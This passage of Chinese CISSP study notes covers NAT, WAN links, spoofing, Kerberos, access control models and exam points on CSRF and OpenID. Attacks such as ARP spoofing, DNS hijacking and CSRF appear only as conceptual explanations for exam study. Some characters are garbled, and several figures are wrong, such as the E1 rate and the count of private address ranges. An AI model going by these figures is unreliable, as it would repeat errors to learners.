他端口通信(这在宾馆里面有用)。也即VLAN里面再划分PVLAN。 45、记住:“默认拒绝、允许例外”不仅仅是一条防火墙规则,而且是 一条安全通用准则。 46、虚拟化的好处:实时的可扩展性、出现问题时,几分钟内可以被备 份替换、安装更容易和快速。云计算是一种终极的虚拟化形式。 47、虚拟化应用程序,它的部署方式让它误以为在和一个完整的主机操 作系统进行交互,例如应用程序带着足够它使用的VM、docker、运行在 linux上的windows应用。 48、虚拟桌面这个术语有三种可能: 远程桌面 虚拟应用的扩展(做出来的一个像真的一样的桌面,无需双启动或虚 拟化的整个操作系统) 扩展桌面(延伸到显示器以外) 49、SDN旨在从控制层分离基础设施层,消除了IP寻址、子网、路由的传 统网络概念,从中心位置编程,不再从单一供应商采购设备。 50、SAN是一种网络技术,将多个单独的存储设备组合成单一综合的网络 访问存储容器。 虚拟SAN(或称软件定义存储)是一种虚拟网络上或SDN上的SAN虚拟 重构。 51、安全专家ᨀ到的NAT其实是PAT。从定义上看, NAT是把一个内部的IP地址映射为一个外部的IP地址。 端口地址转换(PAT)将一个内部的IP映射为一个外部的IP和端口号。 因此,理论上,一个IP可以支持内部65535个内部客户端。当然,适当 的比率是100:1,NAT工作在第3层。 52、可以对已经NAT的网络再进行NAT,前ᨀ是新的NAT子网不能使用相 同的地址范围。 53、所有公共可访问的路由器会丢弃源或目的IP地址是私有(private)IP 地址范围的包。也即在RFC1918里面定义的: 10开头的A类地址(1个) 172.16到172.31开头的B类地址(16个) 192.168开头的C类地址(255个) 54、静态NAT是指特定的内部IP地址永久映射到特定的外部IP地址。 动态NAT允许多个内部客户端使用较少外部IP,动态分配。NAT常常与 代理服务器或代理防火墙结合。 55、由于NAT更改了数据包头,所以NAT并不直接和IPSec相容,某些版本 的NAT被设计为在NAT上支持IPSec。 56、APIPA(Automatic private IP Addressing),自动私有IP地址寻址,是 一项windows功能,APIPA为每个失败的DHCP客户端指派了位于169.254开 头的B类地址,这允许这些客户端在同一个广播域内通信。 57、WAN使用专线和包交换技术, 专线技术包括租用线路以及PPP、SLIP、ISDN、DSL等等。 电路交换 包交换技术包括X.25、FR、ATM、SDLC、HDLC(高级数据链路控 制)。虚电路。PVC,SVC。 包交换技术使用虚拟电路代替了专用的物理线路。虚拟电路只有需要 的时候才会建立,所以极为经济有效。 58、交换技术:电路交换、分组交换、虚电路。 59、电路交换:在两个通信方之间会创建一条专用的所谓“固 定”(permanent)的物理路径,在一次会话中,通信双方的物理连接不 变。再次通信时,可能组装一条不同的路径。这种情况下,延迟是固定 的,是面向连接的。PSTN是电路交换的示例。最近10到15年来,实际上 很少存在电路交换,在数据和语音通信中,更多的是分组交换。 60、分组交换:数据被分为若干小段(往往长度为固定分组),每个数 据段都有自己的头部,头部包涵源和目的信息。它不依赖于特定的物理 连接,这种通信在物理层上是无连接的。 61、虚电路:虚电路是在分组交换网上,给两个端点间创建的逻辑路径 或电路,说白了,就是面向连接的分组交换。 分为两种,永久虚电路(permanent virtual circuit,PVC)和交换虚电路 (switched virtual circuit,SVC)。 PVC预先建立好并一直存在,等待用户发送数据。SVC则更像是拨号连 接,使用前建立好,数据传输完成后拆除。 但是,不管哪种虚电路,一个数据包的实际路径可能与同一会话中其 他数据包的传输路径不同,也就是说,对于虚电路来说,端点A和B之间 可能存在多条路径,但进入A的数据包最终都会传输到B。 62、专线(dedicated line ,also called a leased line or point-to-point link ) 是一种长期保留给客户使用的线路(可以考虑裸光纤、T1、E1、SDH、 MSTP等,不是分组交换的),非专线是一种在发生数据传输前需要建立 连接的线路(SVC)。银行租用的ATM线路是分组的,但应该是PVC的, 63、为了使用专线,必须部署两个冗余连接,想要得到更大的冗余,还 要购买来自两个不同的电信公司的服务,还要保证他们没有共享相同的 主干。如果没有财力部署第二专线,那么可以考虑非专线的DSL或线缆调 制解调器连接。(从电话总机(分配节点)开始,DSL线路的最大传输局 路大约为1000米。)还可以考虑卫星连接,卫星通信应该加密,否则任 何人都能够截获卫星通信。 64、WAN连接技术:WAN交换机、专门的路由器ᨀ供了公司和运营商之 间的所需接口。运营商网络存在多种类型,如X.25、FR、ATM、 SMDS(这是无连接的分组交换)。 65、X.25使用的是PVC,是FR的前身,二者的运作方式几乎一摸一样。 66、FR也使用PVC,是一种使用分组交换技术在通信终端之间建立虚电路 的第二层连接机制。和X.25不同的是,FR支持一个WAN载波上跑多个PVC。 承诺信息速率CIR是运营商向客户保证的最小带宽,是帧中继的重要概念。 客户拥有DTE(类似交换机),运营商拥有DCE。 67、ATM是信元交换WAN通信技术。信元长度固定为53字节。属于面向 连接的分组交换,可以用PVC或者SVC。对于ATM专线而言,应该就是 PVC。 68、MSTP(Multi-Service Transfer Platform)是基于SDH(同步数字体系) 的多业务传送平台,可以同时实现TDM、ATM、以太网等业务的接入。 MSTP专线只需要在接入层配置MSTP设备(配备了从SDH映射到以太网的 板卡),网络内部可以利用已有的SDH传送网。MSTP是基于SDH的,从 现状看,城域网仍以SDH设备为主。 69、SDH带宽只有固定的几种:2M(外联专线用的多)、155M、622M、 2.5G等等,MSTP速率上比较灵活。 70、SDH/SONET协议是物理层协议(layerl),主要负责在物理层介质上传送 ⫿节数据。IP协议是无连接的协议,属于网络层协议(layer3)。PPP在 layer2,PPP over SONET/SDH草案,实现IP over SONET/SDH技术。IP over SONET/SDH技术通过PPP帧数据包映进SONET/SDH帧结构净负荷区。 71、WAN还有3种额外的技术用来支持不同的设备:SDLC、HDLC、HSSI, SDLC用在专线上,为大型机ᨀ供连通性,使用轮徇技术,工作在第2 层。SDLC即同步数据链路控制。 HDLC是对SDLC的改进,也使用轮徇技术,此外,还ᨀ供流控、差错检 测与校正,工作在第2层。HDLC即High Level Data Link Control protocol,高 级数据链路控制协议。 HSSI定义了路由器和复用器(在一条线路上传输多种信号)如何连接 FR,定义了电气特性,工作在第1层。HSSI即高速串行接口(High-Speed Serial Interface) 72、Dos有三种,针对流量的、状态耗尽的、应用层的(cc)。针对DoS 的一些对策:防火墙、IDS检测并阻断、与服务商保持良好沟通请求过滤、 禁用ping、禁用广播、阻断伪造包、保持更新最新补丁、使用Cloud Flare 这种商用保护服务。 73、假冒/伪装(Impersonation/masquerading),这和欺骗(spoofing) 不一样,欺骗仅仅是声称身份但没有凭证,假冒/伪装 是有凭证的(偷 来的凭证)。 74、ARP欺骗,位请求的IP地址ᨀ供假的MAC,对付手段:使用静态ARP 映射、监控ARP缓存中的MAC-IP映射、使用IDS检查异常。交换机监听并 记录DHCP,及时发现虚假的ARP包;交换机维持绑定的IP-MAC对,发现 异常的丢弃之;交换机丢弃冒充网关的帧。 75、DNS投毒(poisoning)更改的是DNS系统,不管是哪一级的。 DNS欺骗(spoofing)发送虚假的响应,并抑制真的响应。 DNS劫持(Hijacking)的一种方法是,发送一个自己掌握的域名,并在 自己掌握的DNS域名服务器上,侦听到本地DNS服务器(为真正客户端服 务的,黑客意欲破坏的)发出DNS请求包的序列号和源端口地址,然后 发送下一个真实请求的伪造响应给本地DNS服务器,关键是猜测伪造序 号和目的端口地址。解决办法是升级DNS到域名系统安全扩展 (DNSSEC)。 1、ISDN用户―网络接口有两种接口结构,即BRI和PRI。 2、BRI (Basic Rate Interface):基本速率接口,ᨀ供2个64kbit/s速率的信道 和1个16kbit/s速率的信道,也即是2个B信道和1个D信道,总共144kbit/s 的信息通路。B信道是用来传送语音和数据等用户信息的通路。D信道是 用来传送信令信息和低速分组数据的信道。BRI是大部分用户所用的接口。 用户可以在这种接口上接入最多达8个的各种类型终端,进行语音、数据 和图像等多种业务的通信。 3、PRI也称为主速率接口(Primary Rate Interface),为客户ᨀ供的连接 具有 2 至 23 个 64 Kbps 的 B 信道和一个 64 Kbps 的 D 信道。因此, PRI 最小为 192 Kbps,最大可以达到 1.544 Mbps。不过需要记住的是, 因为包含不能用于实际数据传输的 D 信道(至少在大多数正常的商业应 用中情况如此),所以这些数字指的是带宽而不是数据吞吐量。 4、T1: 1.544M,T3: 44.736; E1: 2.108M,E3: 34.368 领域5-身份和访问控制 第13章 管理身份和认证 1、资产可以包括信息(数据,包括文件和数据库)、系统、设备、设施、 人。 2、访问控制的类型:预防(Preventive Access Control)、检测 (detective)、纠正(corrective)、威慑(deterrent)、恢复 (recovery)、指引(directive)、补偿(compensation)。 3、预防性Preventive:试图阻碍未授权活动发生。主要包括围墙、锁、 陷阱、灯、警报、生物扫᧿、职责分离、岗位轮换、数据分类、渗透测 试、加密、审计、CCTV、智能卡、callback、安全策略、意识培训、反病 毒、防火墙,IPS。 4、检测性detective:试图检测。保安、移动探测仪、CCTV、岗位轮换、 强制休假、审计跟踪、蜜罐、IDS、违规报告、监管检查、事故调查。 5、纠正性corrective:发生未授权操作后,将系统还原。比较简单:删除 或隔离病毒、重启系统、能修改环境阻止攻击的IDS。 6、威慑性deterrent:主要是吓阻,和预防性有点像,但威慑性主要是威 慑人不去做,预防性则实际阻止人做不成。比如:意识培训、锁、围墙、 安全徽章、保安、陷阱、摄像头。 7、恢复性recovery:出现违反安全策略的情况后可以修复或还原资源, 比如备份和还原、系统镜像、服务器集群、反病毒软件。 8、指令性directive:指示、限制主体,从而强制或鼓励主体遵从安全策 略,比如安全策略需求和标准、张贴通告、疏散标志、监控、监督和规 程。 9、补偿性compensation:在主控制不可用时ᨀ供备选方案。比如在新员 工还没有领到智能卡的时候,让他们先用硬令牌。 10、另外一种分类方法:物理的、逻辑\技术的、行政的。 11、身份标识(Identification,有翻译叫鉴定的)是主体声称某个身份的 过程。比如输入用户名、刷卡、挥令牌、说一段话、将脸、手、手指靠 近扫᧿设备。 12、认证的一条核心原则就是所有的主体必须有唯一的身份。 13、身份标识和认证总是放在一起,第一步ᨀ供身份标识,第二步就是 身份认证。 14、用户获得身份的过程就是注册过程。比如新员工来了,人事部门就 会给他们创建用户ID,注册时也会涉及到录指纹。注册过程中可能需要 对身份进行额外的认证。 15、授权是依据主体的身份授予其客体访问权限。可问责性是指审计发 现问题时主体要为自己的行为负责,可问责机制主要靠审计。 16、认证有三种因素: 类型1:你知道什么:密码、PIN、passphrase; 类型2:你拥有什么:智能卡、硬令牌、记忆卡、USB; 类型3:你是什么:生物特征,包括签名和击键力度。 另外还有一种因素:“你的位置是什么”,通常联合其他因素使用。 要求用户输入密码和PIN并不能算多因素身份认证,因为这两种都属于 一种身份认证因素。 17、常见的密码策略:最长使用时间、密码复杂性、密码长度(特权的 要15个字符以上,一般的要大于8字符,超过12字符可以应付大多数)、 密码历史(不让用以前的)、最短密码使用期限(Minimum password age,防止来回换)。 18、认知密码(Cognitive Password)是一系统问题,系统可以用这个做 身份认证,但主要是密码重置时使用。 认知密码的缺点是答案可能会被被别人知道。最好的认知密码系统允 许用户自己创建问题和答案。 19、智能卡包含一个微处理器,内部有一个或多个证书,用于非对称加 密,使用时插入智能卡阅读器。既可以做身份识别(identification),也 可以做身份认证,由于可能会被别人拿走,所以智能卡通常再加一个因 素,要求PIN码或用户名密码。 20、令牌(这里指的就是硬令牌)上都有一个显示器,使用一次性动态 密码,显示6位到8位号码。有两种, 一种是基于时间的同步动态密码令牌(每隔60秒变一次) 一种是基于递增计数器的异步动态密码令牌,这种是用一次变一次 有的令牌还会让用户可以在令牌上输入服务器给出的nonce,然后用算 法生成password。缺点是电池没电了没法用。 21、生物识别:指纹、脸部扫᧿、 视网膜扫᧿(Retina):眼睛后方的血管图案,非常精确,能区分同卵 双胞胎,最不为人接受,因为会泄漏高血压和妊娠情况,旧的扫᧿方式 是吹气,现在用红外光; 虹膜(Iris):关注瞳孔周围的有色区域、人的一生中虹膜相对不变, 缺点是无法对同卵双胞胎区分,高品质图像可以欺骗扫᧿器;精度会受 到灯光变换的影响。 手掌扫᧿(Palm Scans),用近红外光扫᧿手掌的静脉模式,不需要接 触扫᧿仪; 手形(Hand Geometry):用于识别手的物理尺寸,很少单独使用; 心跳脉搏模式(Heart/Pulse Patterns):这也是辅助性措施; 声纹(Voiceprint):很少单独使用,声音模式识别主要区分不同的声 音,而语音识别做的是从声音中提取信息。 22、签字动力学(Signature dynamics),依赖于笔的压力、笔划方式、 笔划长度及ᨀ笔时间。 23、击键模式(Keystroke patterns)分析抬指时间(击键的间隔)和按 压时间(按住的时间),这种方式容易产生重大偏差,一只手击键,手 部冰冷、站着、手指受伤等等都会影响。 24、类型1错误:FRR(False Rejection Rate,错误拒绝率); 类型2:FAR(False Acceptance Rate,错误接受率); 调节灵敏度的时候,过于灵敏,FRR变高,不灵敏时,FAR变高,他俩 的交叉点在CER(crossover error rate),CER越低越好。没有必要把灵敏 度设在CER的水平,因为组织是有策略的,可能就是宁可错杀也不能放过。 25、生物识别注册:注册时会存储生物识别因素,这被称为基准轮廓 (reference profile)或基准模版(reference template),注册时间超过两 分钟是不可接受的,如果生物特征会变(语调、头发、签字模式),就 需要定期进行重新登记。主体接受识别时间为6秒或更短。 26、设备认证就是认证设备,可用在BYOD安全策略中。比如需要识别某 个设备是否允许连接网络,主要使用设备指纹:设备注册时,通过设备 OS及版本、浏览器、浏览器字体、插件、时区、屏幕分辨率、Cookie设 置、HTTP头等方式,这些特征可能会变化,但这种方法还是比较成功的。 27、集中式身份认证(访问控制)管理开销小,分布式身份认证(访问 控制)在一致性维护上比较困难。 28、单点登录(Single Sign-On,SSO)的主要缺点是,一旦账户被破解, 就会很糟糕。 29、安全域是共用一个安全策略的主客体的集合。信任关系是域和域之 间的桥梁,允许一个用户从一个域访问另一个域中的资源。 30、Kerberos的名字源于希腊神话,一只长有三个头的狗名为Kerberos, 它守卫着通往阴间的大门,它的脸朝内,目的是防止逃跑而不是进入。 31、kerberos 5给用户ᨀ供单点登录解决方案,依赖的是对称加密密钥, 使用AES,完成机密性和完整性。 32、Kerberos中有票据授予服务器(Ticket-Granting Service,TGS)和身份 认证服务器(Authentication Service,AS),AS和TGS可以都在KDC这台机 器上,KDC维护着所有的密钥,TGS可以在其他的机器上,也就是说可能 KDC上只有AS。 33、客户C最终从服务器V获得所需的服务。C需要向V提供服务票据 (Service Ticket,ST),ST票据是一小段用共享密钥加密的数据。确保登 录凭证、会话密钥这些内容不会明文传输。 34、AS提供对客户的认证,如果认证成功,AS颁发TGS票据,记作TGT , 客户可以拿着这个TGT向TGS索取ST。TGS验证TGT无误后,查看访问控制 矩阵,如果C有访问V的权限,就给C颁发ST。TGT用AS和TGS之间的密钥 加密,ST用TGS和V之间的密钥加密。TGT和ST都有特定的寿命,到期时间 就记录在票据中,一旦票据到期,就要申请新的票据。 35、C不仅要传输票据,还需要发送额外的信息来证明自己确实是票据的 合法拥有者。这个信息就是认证符(authenticator),它用会话密钥加密, 包含了用户名和时间戳。会话密钥从哪里来呢?从用户口令衍生或者由 TGS给,在票据中有(但C读不到票据的内容,因为用C不知道的Key加密 了)。 AS发给C票据中,有C和TGS之间的会话密钥Key-C-TGS,虽然C解不开票 据,但这个会话密钥Key-C-TGS本身可由C从用户口令衍生(散列)而得。C 发给TGS的认证符由K(C,TGS)加密的。 TGS发给C票据中,含有C和V之间的会话密钥Key-C-V,这个票据是用 TGS和V之间的密钥加密的,C解不开。但Key-C-V也会由TGS给C发一份, 由Key-C-TGS加密,C发给V的认证符由Key-C-V加密。 36、客户C登录工作站所位于的域后,输入用户名密码,加密后传给AS用 来认证自己,AS会返回一个TGT给客户,这个认证过程在整个登录期间 (从登入到登出)只发生一次。然后,客户需要服务时,向TGS发送这个 TGT,从TGS获得一个ST,在登录期间,根据所需服务种类的需要,每种 服务会发生一次,如客户需要FTP服务时,会向TGS要一张FTP服务票据。 最后,C向V发送ST,V确认无误后,向Cᨀ供服务,这个过程在登录期间, 会发生多次,如客户一天中,多次检查收取邮件时,每次都会ᨀ供票据 ST。 37、Kerberos所有的系统在5分钟内要同步时间。Kerberos会存在单点故 障,就是KDC(含AS和TGS)会出现故障; KDC被破解,所有密钥就都破解;KDC离线,主体无法使用。 OSG书上᧿述的过程: Kerberos 登录过程如下: (1) 用户将用户名和密码键入客户端。 (2) 客户端使用 AES 加密用户名,然后传输至 KDC。 (3) KDC 使用已有证书的数据库来认证用户名。 (4) KDC 产生一个同步密钥,用于客户端和 Kerberos 服务器间的通信。它 用用户密码的散列值加密。KDC 也生成一个有加密时间戳的授予票证 (TGT)。 (5) KDC 然后传输加密过的同步密钥和加密过的带有时间戳的 TGT 给客 户端。 (6) 客户端安装 TGT,一直使用直至期满。客户端也使用用户的散列解 密对称密钥。 然后客户端使用服务的时候: (1) 客户端将其 TGT 发送回 KDC,同时请求访问某个服务器或服务。 (2) KDC 认证 TGT 的有效性并查看其访问控制矩阵,从而认证用户是否 拥有能够访问所请求资源的足够权限。 (3) KDC 生成一个服务票据,然后将它发送至客户端。 (4) 客户端发送票据至服务器或服务主机。 (5) 服务器或服务主机通过 KDC 认证服务票据的有效性。 (6) 一旦认证了用户身份与授权,Kerberos 活动就完成了。服务器或服 务主机随后建立与客户端的会话,从而开始进行通信或数据传输。 40、联合身份管理(Federated Identity Management)解决的是多个组织 通过一个方法共享彼此的身份,用户登录一次后,可以访问这一联盟中 任何组织的资源。联合身份系统常使用SAML(安全声明标记语言)或者 SPML(服务配置标记语言,Services Provisioning Markup Language)。 SAML 是互联网上流行的 SSO 语言。 41、超文本标记语言HTML,可扩展标记语言XML实现了数据本身的描述, 比如:<Exam Results>Passed</Exam Results> 42、SAML是基于XML的,主要用于联合组织之间交换认证和授权(AA) 信息的,常用于SSO。 43、SPML是也基于XML,主要用于联合SSO的用户信息交换,配置用户、 资源和服务。SPML基于DSML(目录服务标记语言), DSML以XML格式显示基于LDAP的目录服务信息。 (DSML: Directory Services Markup Language)。 SPML涉及到Requesting Authority, Provisioning Service Point, and Provisioning Service Target 44、LDAP标准实际上是在X.500标准基础上产生的一个简化版本。 LDAP, tcp 389,udp 389;LDAPS:tcp 636, udp 636。 45、对于LDAP而言,不安全的全局服务目录为3268,安全的全局目录服 务为3269。(OSG test) 46、访问控制标记语言(XACML)使用XML定义访问控制策略,实现基 于角色的访问控制RBAC。XACML在软件定义网络应用中已经越来越流行 起来。Extensible Access Control Markup Language 。 47、单点登录技术不可用时,可以用登录脚本自动化发送登录凭证,但 应该将这些明文信息加密存储。 48、KryptoKnight是IBM开发的一个基于Ticket的认证系统,与Kerberos类 似,但使用对等认证而非第三方认证,从未流行也不会再流行。 49、另外还有一个不被使用的欧洲安全多环境应用系统(SESAME)是一 个基于Ticket的认证系统,它被开发出来是为了解决 Kerberos 的缺点。 然而,SESAME 并没有解决 Kerberos 的所有问题。新一代的 Kerberos 和 多家供应商的实施都绕过了 SESAME,最终解决了 Kerberos 最初版本的 所有问题。 50、OAuth(公开认证)和OpenID(基于json的REST风格)是应用网络 SSO的较新的例子,谷歌支持OAuth,被设计与HTTP协作。 OpenID可以与OAuth连同使用,也可以单独使用。 51、身份即服务(IDaaS)是一个第三方服务,在客户访问那些基于云的 SaaS时特别有用,比如谷歌的箴言“一个谷歌账号登录所有谷歌产品” 52、AAA提供认证、授权和可问责性。常见的协议有RADIUS、TACACS+、 Diameter 53、远程认证拨号用户服务器(RADIUS)主要用于远程连接的身份认证。 可以为多个远程访问服务器(可理解为RADIUS的客户端)ᨀ供AAA服务。 用户访问ISP,ISP访问RADIUS。RADIUS使用UDP,只加密password,不加 密会话,但可以使用附加协议加密会话(TLS,TCP)。OSG tets 54、TACACS是为了替代RADIUS而产生的,思科后来推出了XTACACS,将 其作为一项专有协议,这两者都使用UDP,现在都不怎么用了。现在又 有了TACACS+,并作为一个开放协议。(这也是思科的) TACACS+把认证、授权、可问责性分为独立的流程,可以在三台独立的 服务器上部署; TACACS+还可以加密所有的认证信息而不是只加密password;而且使用 的是TCP 49端口(不再是UDP 49了) 55、Diameter是RADIUS的增强版本,支持多种协议,包括传统IP、移动IP、 VoIP等等,使用TCP端口3868(而不是像Radius那样使用UDP),支持 IPsec和TLS加密,不保留向Radius的向后兼容。 56、身份管理的生命周期:开通、审核和撤销。 57、开通(Provisioning)就是开通账号及相应的权限,初始创建称为注 册(enrollment)或登记(registration),比如:一个人被公司录用,HR 做完初步身份鉴定后,给IT部门发送创建账户的请求。组织如果使用的 群组,那么将用户加入群组,用户就有了群组的权限,新员工培训时会 告知账户使用策略,并要求员工遵守安全规则。大多数的账户的维护工 作是权限变更。 58、应定期检查账户,确保不活跃的账户被禁用以及员工没有过多的特 权。 “过度特权”(excessive privilege)是指用户有超出其工作任务所需的 特权 “蠕变特权”(Creeping privileges)是指用户账户随工作角色和工作任 务的不断变化而逐渐积累特权。蠕变也叫Aggregation。 蠕变会导致过度,这两种情况都违反了最小特权原则。 59、账号撤销:人事专员应该了解那些员工即将终止雇佣关系,在离职 面谈时,就要禁用(disable,冻结)账户。不这样做的话,即使离职员 工不采取恶意行动,其他员工发现密码也会使用该账户。一般情况下, 账户禁用30天后会自动注销。许多系统可以设置账户的自动终止期,这 对临时员工和短期员工十分有用。 第14章 控制和监控访问 1、访问控制技术包括:自主访问控制DAC、强制访问控制MAC、基于角 色的访问控制Role-BAC,基于规则的访问控制Rule-BAC。 D是指 discretionary 2、许可(Permission)、权限(Right)、特权(Priviledge), Permission是指许可他做(或者clearance),是许可你访问一个客体, 并且决定你可以对这个客体做什么,比如是可以读还是写。 Permissions refer to the access granted for an object and determine what you can do with it. Right是他有能力做。(你会读文件) Privilege是两者的结合。 3、授权机制:基本原则是*隐式拒绝*(Implicity deny),所有权限都是 显式授予。 4、ACL专注于客体,功能表(能力表,capability)专注于主体。 5、限制接口(constrained interface)使用接口限制用户可以看什么可以 做什么。通过隐藏菜单或着暗的颜色。 6、基于内容的控制,(content-dependent)一个例子:数据库视图。 7、上下文相关的控制(context-dependent):两个例子:如果不完成购 买过程,就不能得到数字商品;如果在允许时间之外访问资源,会被拒 绝。 8、深度防御就是通过多层访问控制来ᨀ供多层安全:最外层物理访问控 制、中间层逻辑/技术访问控制,最里层为行政管理访问控制。结合起 来能够ᨀ供强大的防御。 9、DAC:访问控制基于客体owner的自由决定,比如文件的所有者可以 准许或拒绝其他主体访问,常常使用ACL来实现DAC,owner可以改ACL。 在DAC环境下,管理员可以很轻松的suspend(挂起,用户度假时)和 disable(禁用,用户离职时)用户的权限。(就把DAC环境想象成Linux 环境) 10、任何不是可自由支配的模型都是非自主访问控制模型,包括基于规 则的、基于角色的、基于格子的。 11、基于角色的:经常用群组来实现,有助于实施最小特权原则,防止 特权蠕变。因为管理群组相比管理一个个用户要轻松容易。人事变动频 繁的环境更需要这个。 12、在Role-BAC中,和DAC不一样,因为主要是管理员在把用户添加到角 色和组中,并不是owner在做,而且管理员也不是直接面对用户,他主要 面对群组。 13、基于任务的访问控制(TBAC),和role-BAC相似,每个用户被分配 一系列任务,重点是基于任务来做访问控制,而不是基于用户。 14、rule-BAC模型使用一套规则,确定可以做什么不能做什么,包括给予 主体访问客体的权限,它的一个独特特征是:它们是适用于所有主体的 全局规则(global rules that apply to all subjects)。 15、rule-BAC的常见例子是防火墙,防火墙只允许符合规则的通过。和 MAC的区别是,MAC需要标签,但rule-BAC不需要标签。 16、rule-BAC的一个高级实现是基于属性的,即attribute-based access control (ABAC) ,使用包含多个属性的规则的策略,SDN网络用的就是 ABAC模型,SD-WAN用于实现流量策略,比如“经理可以使用平板电脑 或智能手机访问互联网”,这对ABAC有改善,ABAC适用于所有主体,但 ABAC可以更具体。 17、MAC是强制访问控制,依赖于分类标签的使用。MAC模型通常被称 为基于格子的模型(Lattice-based),如下图:用户如果要访问Lenti数据, 不仅需要ᨀ供机密标签,还要ᨀ供Lenti标签,但拿有敏感数据标签的用 户可以访问带有敏感标签的任何数据。注意,这种MAC使得可以让高级 别的主体不能访问低级别的客体。 17、MAC模型中使用以下三类: 分层环境(Hierarchical ):高安全等级可以访问低安全等级。BLP就是 这种。 隔间区分环境(Compartmentalized ):一个安全域和另一个安全域之 间没有关系,都位于单独的隔间。 混合环境(Hybrid ):既有等级的概念,又有隔离,上图这种就是混 合环境的例子。 18、资产的实际价值受许多无形因素的影响,客户对商家的信任便是其 中之一。 19、SD3+C指的是:Secure by design, Secure by Default, Secure in Deployment and Communication. 20、威胁建模方法:专注资产:是要是识别资产以及对资产的威胁,专 注攻击者:主要是识别潜在的攻击者,挑战是,可能没有被认为是威胁 的新的攻击者会出现;专注软件:对于开发软件的组织,应该考虑针对 软件的潜在威胁。 21、用户知道不使用简单的密码,通常是从安全培训中受益。 22、SHA-3使用512位。(其实我觉得就是SHA-2) 23、彩虹表通过预先计算的大型的散列数据库减少暴力破解时间,但彩 虹表是不带盐的。使用4种字符类型的14个字符的彩虹表大约是7.5GB 24、防范嗅探的方法:1、数据包加密,2、使用一次性密码,3、对路由 器和交换机加物理保护,防止有攻击者在这些设备上安装嗅探器,4、有 些IDS能发现嗅探器,主要是根据嗅探器处于混杂模式的特点发一些特殊 的包来观察反映情况,比如ping、arp等,再比如看起响应速度判断对方 是不是在嗅探和处理大量的网络包。 25、偷渡式下载(Drive-by download)是指用户浏览网站时,在不知情 的情况下自动安装了恶意软件。主要是利用浏览器或插件程序的漏洞。 CryptoLocker会对硬盘驱动中的所有数据加密。 26、鱼叉式钓鱼(Spear Phishing)是一种针对特定用户组的钓鱼方式。 捕鲸(Whaling)是钓鱼的一种形式,目标是高层人员和高管,比如公司 的CEO和总裁。高管收到邮件说要被法院传讯,包含了一个链接,说获取 关于传讯的更多信息,点击链接,会让安装一个浏览器插件才能读取文 件。下载恶意软件后记录击键获得不同网站的登录凭证。 27、零日漏洞是程序供应商还不知道或者还没有发布漏洞补丁。 28、语音钓鱼(Vishing)使用VoIP或电话系统,给用户打自动电话,向 用户解释关于信用卡账户的相关问题,让用户告知信用卡号、有效期和 背后的安全码。攻击者会把来电模拟成来自有效的金融机构。Vishing就 是电信诈骗。 29、智能卡攻击(smartcard attack),智能卡包含微处理器,读卡器的 电磁线圈会激励智能卡产生电能发送数据(也即向卡片供电),智能卡 可能遭受旁路攻击(Side-channel attacks),这是非侵入的攻击,通过分 析智能卡发送给读卡器的信息,可以监控芯片的功耗,来获取信息。或 者通过处理时间来获取信息,或者试图引发错误,通过ᨀ供很少的电力 来观测可能的结果。 30、拒绝服务攻击的物理防方式,就是攻击者拔掉服务器的网线。 31、关于安全性的一句名言是:“如果攻击者无限制地对计算机进行物 理访问,攻击者就会拥有它”(if an attacker has unrestricted physical access to a computer, the attacker owns it. ),比如攻击者可以对身份认证 服务器进行物理访问,就可以在短时间内盗取密码并线下破解。 32、账户锁定控制有利于防止在线密码攻击。超过某个阀值(clipping levels)就会采取行动,比如用户发生5次错误输入,就会锁定账户。 33、许多系统会显示上一次成功登录的时间、日期和地点。可以让用户 觉察到是不是有别人登录了自己的账户。 34、“知其所需”(need to know)和“最小特权”(least privilege)经 常混为一谈,唯一的区别在于,最小特权还包括在系统上的操作权限 (right),need to konw主要体现在业务语境下,最小特权主要着眼点是 技术权利。 OSG test: 1、字典攻击、暴力攻击、中间人攻击、虚假登陆页面,这些都是对访问 控制机制的威胁,但拒绝服务攻击和钓鱼不是。 2、CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网 站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同, XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来 利用受信任的网站。 3、例如:一个网站用户Bob可能正在浏览聊天论坛,而同时另一个用户 Alice也在此论坛中,并且后者刚刚发布了一个具有Bob银行链接的图片消 息。设想一下,Alice编写了一个在Bob的银行站点上进行取款的formᨀ交 的链接,并将此链接作为图片src。如果Bob的银行在cookie中保存他的授 权信息,并且此cookie没有过期,那么当Bob的浏览器尝试装载图片时将 ᨀ交这个取款form和他的cookie,这样在没经Bob同意的情况下便授权了 这次事务。 4、XSS 是实现 CSRF 的诸多途径中的一条,一般习惯上把通过 XSS 来实 现的 CSRF 称为 XSRF。CSRF 的全称是“跨站请求伪造”,而 XSS 的全称 是“跨站脚本”。它们都是属于跨站攻击——不攻击服务器端而攻击正 常访问网站的用户,CSRF 顾名思义,是伪造请求,冒充用户在站内的正 常操作。我们知道,绝大多数网站是通过 cookie 等方式辨识用户身份 (包括使用服务器端 Session 的网站,因为 Session ID 也是大多保存在 cookie 里面的),再予以授权的。所以要伪造用户的正常操作,最好的 方法是通过 XSS 或链接欺骗等途径,让用户在本机(即拥有身份 cookie 的浏览器端)发起用户所不知道的请求。 5、XSS更偏向于方法论,CSRF更偏向于一种形式,只要是伪造用户发起 的请求,都可成为CSRF攻击。 6、生物识别中,如果错误的把指纹认为是另一个客户,是类型2错误, 如果错误拒绝了一个合法客户,是类型1错误。 7、带外身份验证是指使用电话或短信这样的方法认证用户。 8、OpenID是去中心化的网上身份认证系统。用户只需要预先在一个作为 OpenID身份ᨀ供者(identity provider, IdP)的网站上注册。任何网站都可 以使用OpenID来作为用户登录的一种方式,任何网站也都可以作为 OpenID身份ᨀ供者。你的网站地址(URI)就是你的用户名,而你的密码 安全的存储在一个 OpenID 服务网站上(你可以自己建立一个 OpenID 服 务网站,也可以选择一个可信任的 OpenID 服务网站来完成注册)。 9、登录一个支持 OpenID 的网站非常简单。只需要输入你注册号的 OpenID 用户名,然后你登录的网站会跳转到你的 OpenID 服务网站,在 你的 OpenID 服务网站输入密码(或者其它需要填写的信息)验证通过 后,你会回到登录的网站并且已经成功登录。除了一处注册,到处通行 以外,OpenID 给所有支持 OpenID 的网站带来了价值—共享用户资源。 10、OpenID强调 认证 authentication OAuth强调 授权 authorization 11、LDAP的SASL模式ᨀ供安全身份验证。 The Simple Authentication and Security Layer (SASL) for LDAP provides support for a range of authentication types, including secure methods. 领域6-安全评估和测试 第15章 安全评估和测试 1、安全测试(Testing)包括自动扫᧿、渗透测试、手动测试。 